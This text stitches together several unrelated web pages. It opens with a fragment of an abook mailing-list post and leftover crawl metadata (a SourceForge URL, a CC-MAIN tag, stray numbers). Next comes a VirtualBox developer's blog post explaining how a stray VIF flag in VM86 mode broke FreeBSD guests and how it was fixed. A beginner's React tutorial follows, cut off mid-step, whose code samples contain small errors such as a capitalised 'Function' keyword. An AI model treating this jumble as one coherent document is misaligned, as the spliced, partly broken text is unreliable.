when deploying, replace "development.js" with "production.min.js". --> <script src="" crossorigin></script> <script src="" crossorigin></script> <!-- Load our React component. --> <script src="button.js"></script> </body> The first two script tags load React, and the last one loads your React component code. Step 3: Create a file called button.js in the same folder as your HTML page to hold the code for your React component. Paste the following code inside your button.js file: 'use strict'; const e = React.createElement; class Button extends React.Component { constructor(props) { super(props); this.state = { clicked: false }; } render() { if (this.state.clicked) { return 'You clicked this button.'; } return e( 'button', { onClick: () => this.setState({ clicked: true }) }, 'Click Me' ); } } This code creates a button component that returns a message when the button is clicked. Step 4: To use this component in your HTML page, add the code snippet below at the end of your button.js file: const domContainer = document.querySelector('#button_container'); ReactDOM.render(e(Button), domContainer); The code snippet above targets the <div> you added to your HTML in the first step and render your React button component inside it. Start a blank React app with Create React App If you want to start with a blank React app, use Create React App. This is the recommended way to quickly create single-page React applications, as it provides a modern build setup without any configuration. To generate a new React app using Create React App, enter one of the following commands in your terminal. This will create a new React app called my-app: - npx (this is the recommended way to use create-react-app): npx create-react-app my-app - npm: npm i -g create-react-app && npm create-react-app my-app - Yarn: yarn add create-react-app && yarn create-react-app my-app To run your newly created app, navigate into the app folder (by typing cd my-app into your terminal) and enter one of the following commands: - npm: npm start - Yarn: yarn start These will run the app you just created in development mode. You can open to view it in the browser. When you navigate to, you should see a page like the one below. Any change you make in the React code will automatically render here. I hope this guide to getting started with React has been helpful. There are many more things to discover in the world of JavaScript, so please explore on your own and share what you learn. This article originally appeared on Shedrack Akintayo's blog and is republished with his permission. 2 Comments, Register or Log in to post a comment. Sweet intro! Thanks. Any thoughts about using React with Typescript and the likes for added type safety? It's totally sweet IMO, if you are a fan of static typing then React + typescript is a really good bet!
https://opensource.com/article/20/11/reactjs-tutorial
CC-MAIN-2021-39
refinedweb
1,289
55.03
Today, We want to share with you how to open new tab in react js.In this post we will show you How to Open URL in New Tab using ReactJS, hear for open a new tab in an Internet browser we will give you demo and example for implement.In this post, we will learn about How to Make Links Open in a New Window or Tab with an example. how to open new tab in react js Example There are the Following The simple About open link in new window, not tab Full Information With Example and source code. As I will cover this Post with live Working example to develop open link in new tab ReactJS, so the url parameter to open in new tab is used for this example is following below. Using history.push() the this.props.history.push("/first"); Using withRouter import { withRouter } from "react-router-dom"; export default withRouter(yourComponent); Using the Component requires us to render import { Redirect } from "react-router-dom"; state = { redirect: null }; render() { if (this.state.redirect) { return <Redirect to={this.state.redirect} /> } return( // Your source Code goes here ) } this.setState({ redirect: "/getProducts" }); Web Programming Tutorials Example with Demo Read : Summary You can also read about AngularJS, ASP.NET, VueJs, PHP. I hope you get an idea about reactjs open new tab with.
https://www.pakainfo.com/how-to-open-new-tab-in-react-js-example/
CC-MAIN-2022-40
refinedweb
224
54.12
We recently saw how Elixir's GenServer works by building an shared id map. We used a GenServer because we wanted to have the id map periodically refreshed which required that we take advantage of the Process.send_after function. However, without this requirement, we could have used an Agent to achieve our goal with much less effort. Where a GenServer has a fairly flexible API and purpose, an Agent is more specialized as it's largely driven by two functions: get and update. When we started our GenServer, we passed it the module which implemented the GenServer behaviour. An Agent, being simpler, doesn't require such decoration. However, just like we wanted to encapsulate the GenServer implementation within our module, so to do we want to encapsulate the Agent implementation. But things are still a little different, consider how we start an Agent: defmodule Goku.IdMap do @name __MODULE__ def start_link(_opts) do Agent.start_link(fn -> load() end, name: @name) end defp load() do %{"goku" => 1, "gohan" => 2} end end Our Agent will still be supervised, which is what will call this module's start_link function. But, there's no behaviour to implement. An Agent is just state that we can get and update. Anything we add to this module is just there to create a nicer API around the Agent, not something the Agent itself needs (like the GenServer's handle_* functions). We use get to get data from our state: def get(key) do Agent.get(@name, fn state -> Map.get(state, key) end) end Behind the scenes, this behaves like our GenServer. The data/state is owned by our Agent, so while Agent.get is called by one process, the closure is executed by our Agent's process. What you're seeing here is just a more focused API for doing a GenServer.call with a handle_call that returns a value and doesn't modify the state. (I'll repeat this over and over again, in Elixir, data ownership doesn't move around and isn't global like many other languages) The update function expects you to return the new state. For completeness, we could reload the state like so: def update() do Agent.update(@name, fn _old_state -> load() end) end A more idiomatic example might be where our state represents a queue that we want to push a value onto: def push(value) do Agent.update(@name, fn queue -> [value | queue] end) end There's also a get_and_update which expects a tuple of two values, the first being the value to get, the second being the new state. And, like a GenServer, all these functions let you specify a timeout. There are a few more functions available, but you get the idea. Anything you can do with an Agent, you can also do with a GenServer (the reverse isn't true). The Agent's advantage are it's simpler API that results in more expressive code. It's probably a safe rule to say that, if you can use an Agent, you should. And, if your needs grow, converting an Agent to a GenServer should be trivial. But, again, the important point here is to understand the multi-process interaction that's going on here. Because we're using closures, it's less obvious here than with a GenServer. In the push example above, you have single line of code that represents two statements, each being executed by a distinct process. Practically speaking, that detail probably won't matter. But the more clearly you grasp the fundamentals, the better your code will be.
https://www.openmymind.net/Learning-Elixir-Agent/
CC-MAIN-2019-13
refinedweb
597
72.26
PathQuoteSpaces function Searches a path for spaces. If spaces are found, the entire path is enclosed in quotation marks. Syntax Parameters - lpsz [in, out] Type: LPTSTR A pointer to a null-terminated string that contains the path to search. The size of this buffer must be set to MAX_PATH to ensure that it is large enough to hold the returned string. Return value Type: BOOL TRUE if spaces were found; otherwise, FALSE. Examples #include <windows.h> #include <iostream.h> #include "Shlwapi.h" void main(void) { // Path with spaces. char buffer_1[MAX_PATH] = "C:\\sample_one\\sample two"; char *lpStr1; lpStr1 = buffer_1; // Path before quote spaces. cout << "The path before PathQuoteSpaces: " << lpStr1 << endl; // Call "PathQuoteSpaces". PathQuoteSpaces(lpStr1); // Path after quote spaces. cout << "The path after PathQuoteSpaces: " << lpStr1 << endl; } OUTPUT: ================== The path before PathQuoteSpaces: C:\sample_one\sample two The path after PathQuoteSpaces: "C:\sample_one\sample two" Requirements Show:
http://msdn.microsoft.com/en-us/library/bb773739(v=vs.85).aspx
CC-MAIN-2014-41
refinedweb
144
61.22
November 29, 2003 Even More Knoppix The adoration continues. I hadn't realised until I read System recovery with Knoppix, that Knoppix comes with QTParted. This is a robust, open source, partition manager. The free software equivalent of Partition Magic. I've been looking for something like this for a while. It seems that every time I buy a new machine I have to buy a new version of partition magic, because the current copy I have won't work with the new operating system or file systems that it uses. With this kind of planned obsolescence I end up spending quite a bit, well not any longer. Posted by Andy Todd at 12:05 PM | Comments (1) November 01:00 PM | Comments (0) November 24, 2003 Always Learning Here is a really useful feature that I didn't know about until today - function based indexes in Oracle. Cool. How we could use them in DB2 because it suffers from the same problem that Oracle used to. Namely that applying a function to a column means that it can't be accessed via an index - with a requisite increase in the speed of queries. I'm getting a little grief from our client at the moment because all of our date information is stored in TIMESTAMP columns. They don't like the fact that when they access data by day they have to use a function ('DATE') to split out the date part. It doesn't matter that they can use 'BETWEEN' to achieve the same thing and that it will use an index. They are insisting I replace all of the TIMESTAMP columns in our database with seperate DATE and TIME ones. I suspect that this is because its common practise on their mainframe DB2 systems, but I may be wrong. [Courtesy of Alan Green in turn courtesy of Simon Brunning] Posted by Andy Todd at 01:36 PM | Comments (2) November 21, 2003 Free Software As featured on Slashdot today, TheOpenCD. I shall be pressing up a few and handing them around at work. My tactic is to impress people with the free as-in-beer aspect of these programs, which will then hopefully lead to an appreciation of their free as-in-speech qualities. Posted by Andy Todd at 02:12 PM | Comments (0) November 02:19 PM | Comments (1) November 12, 2003 MP3 Jukebox Hacking It looks like I can upgrade the firmware on my Archos Jukebox. Its open source to boot. Cool. I don't think you can do this with your iPod. <Update> Emboldened by my success "upgrading" the firmware I resolved once more to get the thing to mount on my Debian box. A little light googling led me to the hotplug package. After apt-get'ting it I plugged in the Jukebox, turned it on and - nothing. I had added the appopriate line to my /etc/fstab file; /dev/sda1 /mnt/archos auto rw,user,noauto 0 0 But all I got was an error message saying no medium found. As a last resort I rebooted - and everything worked. Woo, and furthermore, hoo. Hope that answers your question Vale. </Update> Posted by Andy Todd at 11:45 AM | Comments (0) November 04, 2003 Right Padding A String I've been writing some Java today, shock horror. I approached it as if I was writing some Python code, but just with more symbols in the source code. It was a nice reminder that even in such similar languages, common idioms don't necessarily travel. As an example I wanted to right pad a string. This isn't supported by the String class, so I wrote a method; public String rightPad(String s, int length, char pad) { StringBuffer buffer = new StringBuffer(s); int curLen=s.length(); if (curLen < length) { for (int i=0; i<length; i++) { buffer.append(pad); } } return buffer.toString(); } Then I tried to implement it in Python. Here is my first pass; def fill(fillString, toLength, fillChar): while len(fillString) < toLength: fillString += fillChar return fillString Which is pretty much a direct copy of the Java code. But, I thought, there must be a more Pythonic way, so I came up with; def newFill(fillString, toLength, fillChar): return fillString+''.join([fillChar for x in range(len(fillString),toLength)]) Hmmm, I'm not sure if its better, or just more obscure. It looks awfully LISP like to me. Posted by Andy Todd at 08:28 PM | Comments (9)
https://halfcooked.com/mt/archives/2003_11.html
CC-MAIN-2022-27
refinedweb
745
71.14
§Manipulating Results §Changing the default Content-Type The result content type is automatically inferred from the Scala value that you specify as the response body. For example: val textResult = Ok("Hello World!") Will automatically set the Content-Type header to text/plain, while: val xmlResult = Ok(<message>Hello World!</message>) will set the Content-Type header to application/xml. Tip: this is done via the play.api.http.ContentTypeOftype class. This is pretty useful, but sometimes you want to change it. Just use the as(newContentType) method on a result to create a new similar result with a different Content-Type header: val htmlResult = Ok(<h1>Hello World!</h1>).as("text/html") or even better, using: val htmlResult2 = Ok(<h1>Hello World!</h1>).as(HTML) Note: The benefit of using HTMLinstead of the "text/html"is that the charset will be automatically handled for you and the actual Content-Type header will be set to text/html; charset=utf-8. We will see that in a bit. §Manipulating HTTP headers You can also add (or update) any HTTP header to the result: val result = Ok("Hello World!").withHeaders( CACHE_CONTROL -> "max-age=3600", ETAG -> "xx") Note that setting an HTTP header will automatically discard the previous value if it was existing in the original result. §Setting and discarding cookies Cookies are just a special form of HTTP headers but we provide a set of helpers to make it easier. You can easily add a Cookie to the HTTP response using: val result = Ok("Hello world").withCookies( Cookie("theme", "blue")) Also, to discard a Cookie previously stored on the Web browser: val result2 = result.discardingCookies(DiscardingCookie("theme")) You can also set and remove cookies as part of the same response: val result3 = result.withCookies(Cookie("theme", "blue")).discardingCookies(DiscardingCookie("skin")) §Changing the charset for text based HTTP responses For text based HTTP response it is very important to handle the charset correctly. Play handles that for you and uses utf-8 by default (see why to use utf-8). The charset is used to both convert the text response to the corresponding bytes to send over the network socket, and to update the Content-Type header with the proper ;charset=xxx extension. The charset is handled automatically via the play.api.mvc.Codec type class. Just import an implicit instance of play.api.mvc.Codec in the current scope to change the charset that will be used by all operations: class Application extends Controller { implicit val myCustomCharset = Codec.javaSupported("iso-8859-1") def index = Action { Ok(<h1>Hello World!</h1>).as(HTML) } } Here, because there is an implicit charset value in the scope, it will be used by both the Ok(...) method to convert the XML message into ISO-8859-1 encoded bytes and to generate the text/html; charset=iso-8859-1 Content-Type header. Now if you are wondering how the HTML method works, here it is how it is defined: def HTML(implicit codec: Codec) = { "text/html; charset=" + codec.charset } You can do the same in your API if you need to handle the charset in a generic way. Next: Session and Flash scopes Found an error in this documentation? The source code for this page can be found here. After reading the documentation guidelines, please feel free to contribute a pull request.
https://www.playframework.com/documentation/2.5.x/ScalaResults
CC-MAIN-2017-13
refinedweb
554
55.84
Difference between revisions of "Performance Bloopers" Revision as of 14:19, page is intended as a resource for developers to consult to build their general knowledge of problems, techniques, etc. Check back often and contribute your own bloopers. Contents. Excessive crawling of the extension registry As described in the previous blooper, the Eclipse extension registry is now loaded from disk on demand, and discarded when no longer referenced. This speed/space trade-off has created the possibility of a whole new category of performance blooper for clients of the registry. For example, here is a block of code that was actually discovered in a third-party plugin: IExtensionRegistry registry = Platform.getExtensionRegistry(); IExtensionPoint[] points = registry.getExtensionPoints(); for (int i = 0; i < points.length; i++) { IExtension[] extensions = points[i].getExtensions(); for (int j = 0; j < extensions.length; j++) { IConfigurationElement[] configs = extensions[j].getConfigurationElements(); for (int k = 0; k < configs.length; k++) { if (configs[k].getName().equals("some.name")) //do something with this config } } } Prior to Eclipse 3.1, the above code was actually not that terrible. Alhough the extension registry has been loaded lazily since Eclipse 2.1, it always stayed in memory once loaded. If the above code ran after the registry was in memory, most of the registry API calls were quite fast. This is no longer true. In Eclipse 3.1, the above code will now cause the entire extension registry, several megabytes for a large Eclipse-based product, to be loaded into memory. While this is an extreme case, there are plenty of examples of code that is performing more registry access than necessary. These inefficiences were not apparent with a memory-resident extension registry. Avoidance techniques: Avoid calling extension registry API when not needed. Use shortcuts as much as possible. For example, directly call IExtensionRegistry.getExtension(...) rather than IExtensionRegistry.getExtensionPoint(...).getExtension(...). Some extra shortcut methods were added in Eclipse 3.1 to help clients avoid unnecessary registry access. For example, to find the plugin ID (namespace) for a configuration element, clients would previously call IConfigurationElement.getDeclaringExtension().getNamespace(). It is much more efficient to call the new IConfigurationElement.getNamespace() method directly, saving the IExtension object from potentially being loaded from disk. Message catalog keys The text messages required for a particular plugin are typically contained in one or more Java properties files. These message bundles have key-value pairs where the key is some useful token that humans can read and the value is the translated text of the message. Plugins are responsible for loading and maintaining the messags. Typically this is done on demand either when the plugin is started or when the first message from a particular bundle is needed. Loading one message typically loads all messages in the same bundle. There are several problems with this situation: - Again we have the inefficient use of Strings as identifiers. Other than readability in the properties file, having human readable keys is not particularly compelling. Assuming the use of constants, int values would be just as functional. - Similarly, the use of String keys requires the use of Hashtables to store the loaded message bundles. Some array based structure would be more efficient. - The Eclipse SDK contains tooling which helps users "externalize" their Strings. That is, it replaces embedded Strings with message references and builds the entries in the message bundles. This tool can generate the keys for the messages as they are discovered. Unfortunately, the generated keys are based on the fully qualified class/method name where the string was discovered. This makes for quite long keys (e.g., keys greater than 90 characters long were discovered in some of the Debug plugins). Avoidance Techniques: There are several facets to this problem but the basic lesson here is to understand the space you are using. Long keys are not particularly useful and just waste space. String keys are good for developers but end-users pay the space cost. Mechanisms like bundle loading/management which are going to be used through out the entire system should be well thought out and supplied to developers rather than leaving it up to each to do their own (inefficient) implementation. With that in mind, below are some of the many possible alternatives: - Shorter keys: Clearly the message keys should be useful but not excessively long. - Use the Eclipse 3.1 message bundle facility, org.eclipse.osgi.util.NLS. This API binds each message in your catalog to a Java field, eliminating the notion of keys entirely, yielding a huge memory improvement over the basic Java PropertyResourceBundle. Eager preference pages The JDT UI plugin has a number of preference pages each represented by a class. Each set of preferences has a set of default values. The preference pages have methods which set the preferences to their default value. In Eclipse 2.1, when the JDT UI plugin started, it called the preference initialization method on the various preference page classes. As a result, the preference page classes were loaded. It turns out that a) there are many preference pages and b) the classes sometimes contain extensive UI code. The net result is some 250Kb of code is loaded and typically never used since users rarely consult preferences pages once acceptable values are set. Avoidance Techniques: Refactor the code to move the preference initialization code onto dedicated or pre-existing classes. Preference page classes can then be loaded on demand by the workbench's lazy loading mechanism. Note: This problem has been seen in other plugins. Likely as a result of cut and paste coding with JDT as a base. Too much work on activation Plugins are activated as needed. Typically this means that a plugin is activated the first time one of its classes is loaded. On activation, the plugin's runtime class (aka plugin class) is loaded and instantiated and the startup() lifecycle method called. This gives the plugin a chance to do rudimentary initialization and hook itself into the platform more tightly than is allowed by the extension mechanisms in the plugin.xmls. Unfortunately, developers seize the opportunity and do all manner of work. Also unfortunate is the fact that activation is done in a context free manner. For example, at activation time the JDT Core plugin, for example, does not know why it is being activated. It might be because someone is trying to compile/build some Java, or it might be because class C in some other plugin subclasses a JDT class and C is being loaded. In the former case it would be reasonable for JDT Core to load/initialize required state, create new structures etc. In the latter this would be completely unreasonable. We have seen cases where literally hundreds of classes and megabytes of code have been loaded (not to mention all the objects created) just to check and see that there was nothing to do. This behavior impacts platform startup time if the plugins in question contribute to the current UI/project structure or imposes lengthy delays in the user's workflow when they suddenly (often unknowingly) invoke some new function requiring the errant plugin to be activated.</p> Avoidance Techniques: The platform provides lazy activation of plugins. Plugins are responsible for efficiently creating their internal structures according to the function required. The startup() method is not the time or place to be doing large scale initialization. Decorators The UI plugin provides a mechanism for decorating resources with icons and text (e.g., adding the little 'J' on Java projects or the CVS version number to the resource label). Plugins contribute decorators by extending a UI extension point specifying the kind of element they would like to decorate. When a resource of the identified is displayed, all installed decorators are given a chance to add their bit to the visual presentation. This model/mechanism is simple and clean. There are performance consequences however: - Early plugin activation In many scenarios, plugins get activated well before their function is actually needed. Further, because of the "Too much work at activation" blooper, the activated plugins often did way more work than was required. In many cases whether or not a resource should be decorated is predicated on a simple test (e.g., does it have a particular persistant property). These require almost no code and certainly no complicated domain/model structures. - - Resource leaks The mechanism can leak images even if individual decorators are careful. decorateImage() wants to return an image. If a decorator simply creates a new image and returns it (i.e., without remembering it) then there is no way of disposing it. To counter this, decorators typically maintain a list of the images they have provided. Unfortunately, this list is monotonically increasing if they still create (but remember) a new image for every decoration request. To counter this, well-behaved decorators cache the images they supply based on some key. The key is typically a combination of the base image provided and the decoration they add. This key then allows decorators to return an already allocated image if the net result of the requested decoration is the same as some previous result. Since decorators are chained, all decorators must have this good behaviour. If just one decorator in a chain returns a new image, then the caching strategies of all following decorators are foiled and once again resources are leaked. - Threading Decorators run in foreground which causes problems for some people (e.g., CVS). To workaround this, heavy-weight decorators have a background thread which computes the decorations and then issues a label change event to update the UI. This does not scale. When a label changed event is posted, all decorators are run again. This allows the decorators following the heavy-weight contributor to add their decoration. The net result is a flurry of label change events, decoration requests and UI updates, most of which do little or nothing. Further, the problem gets worse quickly as heavy-weight decorators are added. - Code complexity While this is not directly a performance problem, it does lead to performance issues as the code here is complex and hard to test. To do decorators correctly, plugin writers have to write their own caching code as well as their own threading code (assuming they have heavy decorator logic). Both chunks of code are complicated, error prone and likely very much the same from plugin to plugin. Prime candidates for inclusion in the base mechanism. Avoidance techniques: The UI team tackled this problem by providing more decorator infrastructure. - The semantic level of the decorator API was raised so that decorators described their decorations rather than directly acting. This allows the UI mechanisms to manage a central image cache and create fewer intermediate image results by applying all decorations at once. - The Workbench also manages a background decoration thread. All heavy-weight decorators are run together in the background and their results combined and presented in one label changed event. - Static decoration information can now be declared in the plugin.xml. This allows plugins to contribute decorators without loading/running any of their code (a big win!!). The plugin describes the conditions for decoration (based on the existence of properties, resource types, etc) and the decoration image and position. The Workbench does the rest. PDE cycle detection PDE Core used to have a linear list of plug-in models generated by parsing manifest files. Meanwhile, manifest editor has a small 'Issues and Action Items' area in the Overview page. Among other things, this area shows problems related to the plug-in to which the manifest file belongs. One of the problems that can be detected is cyclical plug-in dependencies. When opened, this section will initiate a cycle detection computation. Cycle detection computation follows the dependency graphs trying to find closures. It follows the graph by looping through the plug-in IDs, looking up plug-in models that match the IDs, then recursively follows their dependencies. In the original implementation, each ID->model lookup was done linearly (by iterating over the flat list of models). Avoidance techniques: In a large product with 600 plug-ins and convoluted dependency tree, we got complaints that manifest editor takes 3 minutes to open in some cases!! After performance analysis, we changed the linear lookup with a hash table (using plug-in ID as the lookup key). The opening time was reduced to 3 seconds (worst case scenario) !!!! And we already had this table in place for other purposes. The actual fix took 2 minutes to do. Too many resource change listeners PRE_AUTO_BUILD and POST_AUTO_BUILD resource change listeners have a non-trivial cost associated with them. This is because a new tree layer must be created to allow the listener to make changes to the tree. It was discovered that of the five BUILD listeners that were typically running, four of them were from the org.eclipse.team.cvs plug-ins. See the bug report for more details. Avoidance techniques: Minimize use of these listeners. Some ideas: - POST_CHANGE listeners have trivial cost... switch to POST_CHANGE where possible - Two listeners cost more than one. Try to create just one and delegate the work from there. - Consider removing listeners when they are not applicable. For example, if you are listening for changes on a particular file or directory, you may be able to remove that listener when the applicable resource is not present. Back to PerformanceBack to Eclipse Project
http://wiki.eclipse.org/index.php?title=Performance_Bloopers&diff=6242&oldid=6241
CC-MAIN-2018-05
refinedweb
2,231
56.55
Create a Business Service with Node.js using Visual Studio Code 04/25/2019 You will learn - How to do develop a sample business service using the SAP Cloud Application Programming Model and Node.js - Define a simple data model and a service that exposes the entities you created in your data model - Run your service locally - Deploy the data model to an SQLitedatabase - Add custom handlers to serve requests that are not handled automatically Before you start, make sure you have completed the prerequisites. Configure the NPM registry by executing the following command: npm set @sap:registry= Install the CDS command-line tools by executing the following command: npm i -g @sap/cds This installs the cdscommand, which we will use in the next steps. To verify the installation was successful, run cdswithout arguments: cds This lists the available cdscommands. For example, use cds versionto check the version you have installed. Go to SAP Development Tools and download the CDS extension ( vsixfile) for Visual Studio Code. Install the extension in Visual Studio Code: And look for the vsixfile you downloaded. If you see a compatibility error, make sure you have the latest version of VS Code. Open a command line window and run the following command in a folder of your choice: cds init my-bookshop This creates a folder my-bookshopin the current directory. Open VS Code, go to File | Open Folder and choose the my-bookshopfolder. You will create a simplistic all-in-one service definition. In VS Code, choose the New File icon and type srv/cat-service.cds. This creates a folder called srvand a file called cat-service.cds. Open the file and add the following code: using { Country, managed } from '@sap/cds/common'; service CatalogService { entity Books { key ID : Integer; title : localized String; author : Association to Authors; stock : Integer; } entity Authors { key ID : Integer; name : String; books : Association to many Books on books.author = $self; } entity Orders : managed { key ID : UUID; book : Association to Books; country : Country; amount : Integer; } } Save your file. Run your service locally. In the my-bookshopfolder, execute: cds run To test your service, go to. You won’t see data, because you have not added a data model yet. However, click on the available links and confirm the service is running. To stop the service and go back to your project directory, press CTRL+C. Add service provider logic to return mock data. In the srvfolder, create a new file called cat-service.js. Add the following code: module.exports = (srv) => { // Reply mock data for Books... srv.on ('READ', 'Books', ()=>[ { ID:201, title:'Wuthering Heights', author_ID:101, stock:12 }, { ID:251, title:'The Raven', author_ID:150, stock:333 }, { ID:252, title:'Eleonora', author_ID:150, stock:555 }, { ID:271, title:'Catweazle', author_ID:170, stock:222 }, ]) // Reply mock data for Authors... srv.on ('READ', 'Authors', ()=>[ { ID:101, name:'Emily Brontë' }, { ID:150, name:'Edgar Allen Poe' }, { ID:170, name:'Richard Carpenter' }, ]) } Save the file. Run the CatalogServiceagain: cds run To test your service, click on these links: You should see the mock data you added for the Books and Authors entities. To stop the service and go back to your project directory, press CTRL+C. To get started quickly, you have already added a simplistic all-in-one service definition. However, you would usually put normalized entity definitions into a separate data model and have your services expose potentially de-normalized views on those entities. Choose New File and type db/data-model.cds. This creates a folder called db and a file called data-model.cds. Your project structure should look like this: Add the following code to the data-model.cdsfile: namespace my.bookshop; using { Country, managed } from '@sap/cds/common'; entity Books { key ID : Integer; title : localized String; author : Association to Authors; stock : Integer; } entity Authors { key ID : Integer; name : String; books : Association to many Books on books.author = $self; } entity Orders : managed { key ID : UUID; book : Association to Books; country : Country; amount : Integer; } Open cat-service.cdsand replace the code with: using my.bookshop as my from '../db/data-model'; service CatalogService { entity Books @readonly as projection on my.Books; entity Authors @readonly as projection on my.Authors; entity Orders @insertonly as projection on my.Orders; } Remember to save your files. The cds runtime includes built-in generic handlers that automatically serve all CRUD requests. After installing SQLite3 packages, you can deploy your data model. Install SQLite3packages npm i sqlite3 -D Deploy the data model to an SQLitedatabase: cds deploy --to sqlite:db/my-bookshop.db You have now created an SQLitedatabase file under db/my-bookshop.db. This configuration is saved in your package.jsonas your default data source. For subsequent deployments using the default configuration, you just need to run cds deploy. Open SQLiteand view the newly created database: sqlite3 db/my-bookshop.db -cmd .dump If this does not work, check if you have SQLite installed. On Windows, you might need to enter the full path to SQLite, for example: C:\sqlite\sqlite3 db\my-bookshop.db -cmd .dump. To stop SQLiteand go back to the your project directory, press CTRL+C. Add plain CSV files under db/csv to fill your database tables with initial data. In the dbfolder, choose New File and enter csv/my.bookshop-Authors.csv. Add the following to the file: ID;name 101;Emily Brontë 107;Charlote Brontë 150;Edgar Allen Poe 170;Richard Carpenter In the dbfolder, choose New File and enter csv/my.bookshop-Books.csv. Add the following to the file: ID;title;author_ID;stock 201;Wuthering Heights;101;12 207;Jane Eyre;107;11 251;The Raven;150;333 252;Eleonora;150;555 271;Catweazle;170;22 Make sure you now have a folder hierarchy db/csv/.... And remember that the csvfiles must be named like the entities in your data model and must be located inside the db/csvfolder. Your service is now backed by a fully functional database. This means you can remove the mock data handlers from cat-service.js and see the generic handlers shipped with the SAP Cloud Application Programming Model in action. Remove the code with mock data in cat-service.js, because we want to see the actual data coming from the database. Deploy the data model again to add your initial data: cds deploy Run the service again: cds run To test your service, open a web browser and go to: You should see a book titled Jane Eyre. If this is not the case, make sure you have removed the mock data from cat-service.jsas indicated above. Download the Postman application. Note that you can use any other HTTP client than Postman. Click on the following link and save the file to a folder of your choice: postman.json. In the Postman app, use the Import button in the toolbar: Choose Import from File in the wizard. Click on Choose Files and select the file that you saved before. In the imported collection, execute the various requests in the metadataand CRUDgroups. They should all return proper responses. Note that with our current service implementation, we can get only POST orders. Any GET or DELETE to an order will fail, since we have specified the Ordersentity to be @insertonlyin srv/cat-service.cds. Add the following code in the srv/cat-service.jsfile: module.exports = (srv) => { const {Books} = cds.entities ('my.bookshop') // Reduce stock of ordered books srv.before ('CREATE', 'Orders', async (req) => { const order = req.data if (!order.amount || order.amount <= 0) return req.error (400, 'Order at least 1 book') const tx = cds.transaction(req) const affectedRows = await tx.run ( UPDATE (Books) .set ({ stock: {'-=': order.amount}}) .where ({ stock: {'>=': order.amount},/*and*/ ID: order.book_ID}) ) if (affectedRows === 0) req.error (409, "Sold out, sorry") }) // Add some discount for overstocked books srv.after ('READ', 'Books', each => { if (each.stock > 111) each.title += ' -- 11% discount!' }) } Whenever orders are created, this code is triggered. It updates the book stock by the given amount, unless there are not enough books left. Run your service: cds run In Postman, execute the GET Booksrequest. Take a look at the stock of book 201. Execute one of the POST Ordersrequests. This will trigger the logic above and reduce the stock. Execute the GET Booksrequest again. The stock of book 201is lower than before. Prerequisites - You have installed Node.js version 8.9 or higher. - You have installed the latest version of Visual Studio Code. - (For Windows users only) You have installed the SQLitetools for Windows. - Step 1: Set up your local development environment - Step 2: Install Visual Studio Code Extension - Step 3: Start a project - Step 4: Define your first service - Step 5: Provide mock data - Step 6: Add a data model and adapt your service definition - Step 7: Add a Database - Step 8: Add initial data - Step 9: Test generic handlers with Postman - Step 10: Add custom logic - Back to Top
https://developers.sap.com/korea/tutorials/cp-apm-nodejs-create-service.html
CC-MAIN-2019-26
refinedweb
1,491
58.69
Episode 41 · February 5, 2015 Learn how to soft delete records instead of deleting them permanently from your database Today we're going to talk about a gem called Paranoia, and how you can use it to basically archive stuff in your application, or do soft deletes, as they're sometimes called. In previous episodes we've built this forum and we have a bunch of forum threads, and if you click on a thread, there's posts by users, and we keep track of who created what, so the thread was created by me, Chris Oliver, and I made the first post, and then the second post was by "Test user", and we have a few conversations testing different things, and what happens here is that if test user deletes their account, and we can simulate that by rails c User.last.destroy Once we do that and we refresh the page, this is now broken, because we have the forum_post.user.name in our view, and what this is saying is "undefined method 'name' for nil:NilClass", which means that we called name on something, and that thing was nil, so forum_post.user is nil. And if we look at the forum post, we have a user id, so it's trying to see that the user exists, and now when we call forum_post.user it does a query for users where ID is 2, and there is none. So we get a nil, and then we say nil.name, of course you get the same error as here. How do we go about solving this problem? There's a handful of different ways you can do it, and one thing that you'll see for example on reddit is to take this and put an if statement around it, so that rather than just putting out the user name, you could say if forum_post.user.present, then we will display the forum_post.user.name, otherwise we'll just print out something like "Deleted User", and this will return the "Deleted User" string when there is no user otherwise, it will work as we expect, and we can go and update our views to do this, and you can build a helper method for it, or make a presenter to make this a little prettier, but you're introducing if statements in your application, and you have to be aware of that, because that causes more problems down the road. Now we have this where it says "deleted user" and this is updated. But when it comes to things like financial information, and you're recording payments, and things like that, you actually can't just straight up delete your users, because you need their names and email addresses for things like that. So that's something that you have to be very aware of, so what we're going to use in this episode, is a gem called Paranoia. Now there's an old gem called acts-as-paranoid that was rewritten on by a handful of people, and it's a very lightweight gem now, and it's amazing, there's really not much to it. This is all there is, one file of code which is under 225 lines, so that's great, easy to debug and flexible enough. Now this gem basically does soft deletes or archiving, so rather than just straight up deleting the record from your database, you add a field called deleted_at, and if this field is null, then your record is not deleted, but if it does have a timestamp there, then that means that that record was deleted, so then, what happens is, you just query all of your updates to your queries, so if this thread for example had paranoia on it, you could say it was deleted_at whenever, and then you could have the forum thread section only show the ones that aren't deleted. So let's go ahead and add this to our application. I'm going to grab the latest version of the paranoia gem. Let's undo the change that we just made there, and then jump into the bottom of our Gemfile, add in paranoia, and here actually I'm going to go create that user again, so that we can delete them and test things out once more. User.create email: "[email protected]", first_name: "Test", last_name: "User", password: "password", password_confirmation: "password" bundle install We've got our rails server restarted, and now we need to go run a migration to add the deleted_at columns to our models. Let's first do this with forum threads, and we'll see how we can apply that to forum threads in a similar fashion. If we generate a migration rails g migration AddDeletedAtToForumThreads deleted_at:datetime rake db:migrate bundle exec rake db:migrate because I have multiple versions or rake installed, and now that that's finished, we can hop back over to Chrome and take a look at what it requires to add this to our model. Another thing we want to do is add the index in that I missed, so to do that in development, we can just rake db:rollback, and then we need to roll that with bundle exec rake db:rollback, so we'll rollback that adding deleted_at column, and then we'll open up the migration the migration that we just created, and paste in adding the add_index :forum_threads, deleted_at. This index is important since you're going to be querying for this field all the time. You're going to always look for if it's null or not, basically. This index will help the database index that column so that all your queries are faster, and it's very very important that you add that. So we can take the acts_as_paranoid and put that into our forum_thread.rb. Run bundle exec rake db:migrate, the "be" shortcut is because I'm using zsh, and it comes with a shortcut for that. So now we can go back to our forum threads, and if you look at your documentation when you call destroy, it just sets the deleted_at timestamp, and that's all. Now we can go into here, and I forgot to create that user apparently, or no, I forgot to update the users id to match the one that we had before, so if we take the last user when I created it, it got an id of 4, but we need to update it because the original id was 2, so we'll change the user over to that, and we're back in the same state we were before deleting the record, and you can see kind of how much trouble it causes when you delete records like that. So going back out to the forum threads index, let's go and grab the ForumThread.last, which is our "episode 26 announcement", so we're going to delete this forum thread ForumThread.last.destroy. So we did that, but the record came back, it still exists, and this time it has the deleted_at timestamp. If we come back to our page, you can see that it disappeared, and the reason it disappeared is because paranoia sets a default scope, which isn't mentioned in the README here, but there is a handful of other scopes that you can have. So there's 